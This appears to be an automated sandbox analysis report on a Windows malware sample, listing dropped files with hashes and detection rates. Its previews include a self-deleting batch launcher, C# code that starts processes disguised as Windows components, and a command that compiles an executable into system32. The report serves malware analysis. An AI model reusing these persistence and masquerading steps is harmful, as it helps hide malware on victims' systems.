                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.0536606896881855
                                                          Encrypted:false
                                                          SSDEEP:3:taVq1Zn:tZn
                                                          MD5:74AC20A2681777EE9E3FB36D28CC18CB
                                                          SHA1:31E457C7755B207DE82FC51034D3E4AF61ED0C9E
                                                          SHA-256:0C3A5899C64077787F726EE24ED7081BEC7A32ECC14CB9FA06329629D4DC4228
                                                          SHA-512:4A1D864302892333F03D33521C7279FEA9DC2F2B6D358F4D3C2F637328F4B2195F455D6D7952F9BB0B06659EF90FB6B699D7F69D7C5F72F3C21367AE65CD7739
                                                          Malicious:false
                                                          Preview:xEkxcgydGvAdQ9g7VxOmQPP9M
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):256
                                                          Entropy (8bit):5.149727568596473
                                                          Encrypted:false
                                                          SSDEEP:6:hCijTg3Nou1SV+DED+4ThG5q98sKOZG1wkn23fQtLl:HTg9uYDED+/ODfg
                                                          MD5:54DDF71F4B6EACEDA92203C0E23E6025
                                                          SHA1:3061A1EF99ED0A3930741380A6304754B5AF0EC5
                                                          SHA-256:189622D46F59E4980218016BFA78DDE67CAD7F41EE1627A8D716FF55C1EC8100
                                                          SHA-512:052918971CEE0C5ED8F2EFEFAA453B9336E1F983852FF733182AB46CE83CE7D942E030690212785D7F0BC729AF19D46A6E9BCA5FC9A0ED0E2F8AFD1DE2D71C9B
                                                          Malicious:false
                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\h43HaGdPC8.bat"
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):381
                                                          Entropy (8bit):4.885641393034701
                                                          Encrypted:false
                                                          SSDEEP:6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L2JDAfzGBpujiFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLLv
                                                          MD5:F6D90CE32D9711B08911B0249D679512
                                                          SHA1:34A43A58DBF731DFAAA50EACAB975EBF1CD9ABF1
                                                          SHA-256:524A05093208B546B809CEACA43733B174814D713BDF32C7020CB4E32CCAF85D
                                                          SHA-512:B36D6C44283774B5DBA0378834B1D964B9D0D748F4D093988DFE41C061D7164FB3D67225F26356BD9D627F9324DE8EBCAD4EE97B309C44C1A874B0F59C72D135
                                                          Malicious:false
                                                          Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\fontdriversavescrt\WmiPrvSE.exe"); } catch { } }).Start();. }.}.
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):250
                                                          Entropy (8bit):5.098741097506036
                                                          Encrypted:false
                                                          SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fdMQTn:Hu7L//TRq79cQWf2s
                                                          MD5:70DF5B75FF1CDF9204FB94F861D95A24
                                                          SHA1:9D65537DC62A1C0E399DFEBC4A39842D2B893DE0
                                                          SHA-256:AB739E95A3E09A10D278C355893DD8554FA4ADD994A10D0E0D11B211B8027BCA
                                                          SHA-512:A5ABD3CF8738D5C9F32567F8D82318C4F39B156535AD9600CACC5AB91D3572988E019BF4EB3D59D9A838491997181FA42F526E5DC42BFF0979BAA0AC7B74C935
                                                          Malicious:true
                                                          Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.0.cs"
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (328), with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):749
                                                          Entropy (8bit):5.23878807264005
                                                          Encrypted:false
                                                          SSDEEP:12:+L0hRI/u7L//TRq79cQWf2ZKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:+MI/un/Vq79tWfGKax5DqBVKVrdFAMBt
                                                          MD5:79A11FEE02024A3699AFF7BCBF4863E9
                                                          SHA1:81207301EE41F40561FF4AA8FFEB47F6601F5C90
                                                          SHA-256:AFF113EBB168105349008D4D5E465802828D221BBA0DA4AB6987A44A52144B7D
                                                          SHA-512:AFED4782A2CAFCBE2CE126D51B66B980F22D0F54A4FE26C371F79F6979B7948EDF31CE67B96AD71C37FCB35F46845C285A42D17E646C93A8393A1AC33BA78A1C
                                                          Malicious:false
                                                          Preview:.C:\fontdriversavescrt> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32768
                                                          Entropy (8bit):5.645950918301459
                                                          Encrypted:false
                                                          SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                          MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                          SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                          SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                          SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                          • Antivirus: Virustotal, Detection: 30%
                                                          Joe Sandbox View:
                                                          • Filename: f3I38kv.exe, Detection: malicious
                                                          • Filename: ZZ2sTsJFrt.exe, Detection: malicious
                                                          • Filename: Z4D3XAZ2jB.exe, Detection: malicious
                                                          • Filename: XNPOazHpXF.exe, Detection: malicious
                                                          • Filename: 3e88PGFfkf.exe, Detection: malicious
                                                          • Filename: 9FwQYJSj4N.exe, Detection: malicious
                                                          • Filename: 8k1e14tjcx.exe, Detection: malicious
                                                          • Filename: gkcQYEdJSO.exe, Detection: malicious
                                                          • Filename: file.exe, Detection: malicious
                                                          • Filename: CPNSQusnwC.exe, Detection: malicious
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.932541123129161
                                                          Encrypted:false
                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                          • Antivirus: Virustotal, Detection: 41%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):23552
                                                          Entropy (8bit):5.519109060441589
                                                          Encrypted:false
                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          • Antivirus: Virustotal, Detection: 11%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32256
                                                          Entropy (8bit):5.631194486392901
                                                          Encrypted:false
                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                          • Antivirus: Virustotal, Detection: 35%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):85504
                                                          Entropy (8bit):5.8769270258874755
                                                          Encrypted:false
                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                          • Antivirus: Virustotal, Detection: 69%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33792
                                                          Entropy (8bit):5.541771649974822
                                                          Encrypted:false
                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 38%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):22016
                                                          Entropy (8bit):5.41854385721431
                                                          Encrypted:false
                                                          SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                          MD5:BBDE7073BAAC996447F749992D65FFBA
                                                          SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                          SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                          SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 9%
